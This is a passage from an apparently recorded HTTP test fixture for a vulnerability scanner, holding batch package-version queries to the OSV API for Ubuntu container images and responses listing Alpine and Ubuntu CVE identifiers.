"modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" } ] } ] } headers: Content-Length: - "9123" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 7442 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:20.04", "name": "adduser" }, "version": "3.118ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-files" }, "version": "11ubuntu5.8" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-passwd" }, "version": "3.5.47" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bash" }, "version": "5.0-6ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "dash" }, "version": "0.5.10.2-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debconf" }, "version": "1.5.73" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debianutils" }, "version": "4.9.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "findutils" }, "version": "4.7.0-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "grep" }, "version": "3.4-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gzip" }, "version": "1.10-0ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "hostname" }, "version": "3.23" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "init-system-helpers" }, "version": "1.57" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "acl" }, "version": "2.2.53-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "attr" }, "version": "1:2.4.48-5" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libcap-ng" }, "version": "0.7.9-2.1build1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libxcrypt" }, "version": "1:4.4.10-10ubuntu4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.6ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "cdebconf" }, "version": "0.251ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libffi" }, "version": "3.3-4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gmp" }, "version": "2:6.2.0+dfsg-4ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libgpg-error" }, "version": "1.37-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libidn2" }, "version": "2.2.0-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "xz-utils" }, "version": "5.2.4-1ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "p11-kit" }, "version": "0.23.20-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libseccomp" }, "version": "2.5.1-1ubuntu1~20.04.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libselinux" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsepol" }, "version": "3.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libunistring" }, "version": "0.9.10-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libzstd" }, "version": "1.4.4+dfsg-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "lsb" }, "version": "11.1.0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "mawk" }, "version": "1.3.4.20200120-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sensible-utils" }, "version": "0.0.12+nmu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sysvinit" }, "version": "2.96-2.1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "ubuntu-keyring" }, "version": "2020.02.11.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 256 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "256" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 7442 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:20.04", "name": "adduser" }, "version": "3.118ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-files" }, "version": "11ubuntu5.8" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-passwd" }, "version": "3.5.47" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bash" }, "version": "5.0-6ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "dash" }, "version": "0.5.10.2-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debconf" }, "version": "1.5.73" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debianutils" }, "version": "4.9.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "findutils" }, "version": "4.7.0-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "grep" }, "version": "3.4-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gzip" }, "version": "1.10-0ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "hostname" }, "version": "3.23" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "init-system-helpers" }, "version": "1.57" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "acl" }, "version": "2.2.53-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "attr" }, "version": "1:2.4.48-5" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libcap-ng" }, "version": "0.7.9-2.1build1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libxcrypt" }, "version": "1:4.4.10-10ubuntu4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.6ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "cdebconf" }, "version": "0.251ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libffi" }, "version": "3.3-4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gmp" }, "version": "2:6.2.0+dfsg-4ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libgpg-error" }, "version": "1.37-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libidn2" }, "version": "2.2.0-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "xz-utils" }, "version": "5.2.4-1ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "p11-kit" }, "version": "0.23.20-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libseccomp" }, "version": "2.5.1-1ubuntu1~20.04.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libselinux" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsepol" }, "version": "3.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libunistring" }, "version": "0.9.10-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libzstd" }, "version": "1.4.4+dfsg-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "lsb" }, "version": "11.1.0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "mawk" }, "version": "1.3.4.20200120-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sensible-utils" }, "version": "0.0.12+nmu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sysvinit" }, "version": "2.96-2.1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "ubuntu-keyring" }, "version": "2020.02.11.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 256 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "256" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14065 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": 